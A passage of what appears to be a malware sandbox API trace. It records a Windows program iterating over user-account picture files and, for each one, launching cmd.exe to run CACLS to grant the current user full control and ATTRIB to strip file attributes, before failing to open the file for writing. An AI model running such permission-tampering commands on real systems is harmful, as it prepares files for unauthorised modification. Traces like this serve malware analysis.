returned 0x47 [0186.997] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0186.997] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xefc, dwThreadId=0xfa4)) returned 1 [0186.999] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0187.363] CloseHandle (hObject=0x1b4) returned 1 [0187.363] CloseHandle (hObject=0x120) returned 1 [0187.363] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.363] ReleaseMutex (hMutex=0xf8) returned 1 [0187.363] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.363] ReleaseMutex (hMutex=0xf8) returned 1 [0187.364] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.364] ReleaseMutex (hMutex=0xf8) returned 1 [0187.364] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.364] ReleaseMutex (hMutex=0xf8) returned 1 [0187.364] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile31.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.364] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp", lpFilePart=0x12eab4*="usertile31.bmp") returned 0x52 [0187.364] GetLastError () returned 0x5 [0187.364] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0187.364] LocalFree (hMem=0x1c6cc8) returned 0x0 [0187.364] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0187.364] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0187.364] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.364] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.364] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0187.364] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0187.364] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0187.364] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.364] ReleaseMutex (hMutex=0xf8) returned 1 [0187.364] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.364] ReleaseMutex (hMutex=0xf8) returned 1 [0187.364] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.365] ReleaseMutex (hMutex=0xf8) returned 1 [0187.365] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.365] ReleaseMutex (hMutex=0xf8) returned 1 [0187.365] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile32.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.365] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp", lpFilePart=0x12eab4*="usertile32.bmp") returned 0x52 [0187.365] GetLastError () returned 0x5 [0187.365] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0187.365] LocalFree (hMem=0x1c6cc8) returned 0x0 [0187.365] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0187.365] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0187.365] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.365] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.365] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0187.365] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0187.365] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x924, dwThreadId=0x670)) returned 1 [0187.367] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0187.517] CloseHandle (hObject=0x1b4) returned 1 [0187.517] CloseHandle (hObject=0x120) returned 1 [0187.517] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.517] ReleaseMutex (hMutex=0xf8) returned 1 [0187.517] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.517] ReleaseMutex (hMutex=0xf8) returned 1 [0187.517] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.517] ReleaseMutex (hMutex=0xf8) returned 1 [0187.517] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.517] ReleaseMutex (hMutex=0xf8) returned 1 [0187.517] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile32.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.517] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp", lpFilePart=0x12eab4*="usertile32.bmp") returned 0x52 [0187.517] GetLastError () returned 0x5 [0187.517] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0187.517] LocalFree (hMem=0x1c6cc8) returned 0x0 [0187.518] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0187.518] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0187.518] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.518] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0187.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0187.518] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0187.518] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.518] ReleaseMutex (hMutex=0xf8) returned 1 [0187.518] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.518] ReleaseMutex (hMutex=0xf8) returned 1 [0187.518] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.518] ReleaseMutex (hMutex=0xf8) returned 1 [0187.518] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.518] ReleaseMutex (hMutex=0xf8) returned 1 [0187.518] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile33.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.518] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp", lpFilePart=0x12eab4*="usertile33.bmp") returned 0x52 [0187.518] GetLastError () returned 0x5 [0187.518] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0187.518] LocalFree (hMem=0x1c6cc8) returned 0x0 [0187.518] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0187.518] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0187.519] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.519] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.519] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0187.519] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0187.519] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x908, dwThreadId=0xf3c)) returned 1 [0187.520] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0187.892] CloseHandle (hObject=0x1b4) returned 1 [0187.892] CloseHandle (hObject=0x120) returned 1 [0187.892] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.892] ReleaseMutex (hMutex=0xf8) returned 1 [0187.892] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.892] ReleaseMutex (hMutex=0xf8) returned 1 [0187.892] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.892] ReleaseMutex (hMutex=0xf8) returned 1 [0187.892] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.892] ReleaseMutex (hMutex=0xf8) returned 1 [0187.892] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile33.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.893] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp", lpFilePart=0x12eab4*="usertile33.bmp") returned 0x52 [0187.893] GetLastError () returned 0x5 [0187.893] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0187.893] LocalFree (hMem=0x1c6cc8) returned 0x0 [0187.893] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0187.893] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0187.893] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.893] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.893] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0187.893] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0187.893] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0187.893] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.893] ReleaseMutex (hMutex=0xf8) returned 1 [0187.893] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.893] ReleaseMutex (hMutex=0xf8) returned 1 [0187.893] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.893] ReleaseMutex (hMutex=0xf8) returned 1 [0187.893] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.893] ReleaseMutex (hMutex=0xf8) returned 1 [0187.893] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile34.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.894] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp", lpFilePart=0x12eab4*="usertile34.bmp") returned 0x52 [0187.894] GetLastError () returned 0x5 [0187.894] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0187.894] LocalFree (hMem=0x1c6cc8) returned 0x0 [0187.894] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0187.894] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0187.894] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.894] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.894] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0187.894] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0187.894] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xec8, dwThreadId=0xff0)) returned 1 [0187.896] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0188.068] CloseHandle (hObject=0x1b4) returned 1 [0188.068] CloseHandle (hObject=0x120) returned 1 [0188.068] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.068] ReleaseMutex (hMutex=0xf8) returned 1 [0188.068] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.068] ReleaseMutex (hMutex=0xf8) returned 1 [0188.068] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.068] ReleaseMutex (hMutex=0xf8) returned 1 [0188.068] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.068] ReleaseMutex (hMutex=0xf8) returned 1 [0188.068] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile34.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.068] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp", lpFilePart=0x12eab4*="usertile34.bmp") returned 0x52 [0188.068] GetLastError () returned 0x5 [0188.069] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0188.069] LocalFree (hMem=0x1c6cc8) returned 0x0 [0188.069] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0188.069] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0188.069] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0188.069] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0188.069] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0188.069] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0188.069] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0188.069] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.069] ReleaseMutex (hMutex=0xf8) returned 1 [0188.069] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.069] ReleaseMutex (hMutex=0xf8) returned 1 [0188.069] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.069] ReleaseMutex (hMutex=0xf8) returned 1 [0188.069] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.069] ReleaseMutex (hMutex=0xf8) returned 1 [0188.069] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile35.bmp"), 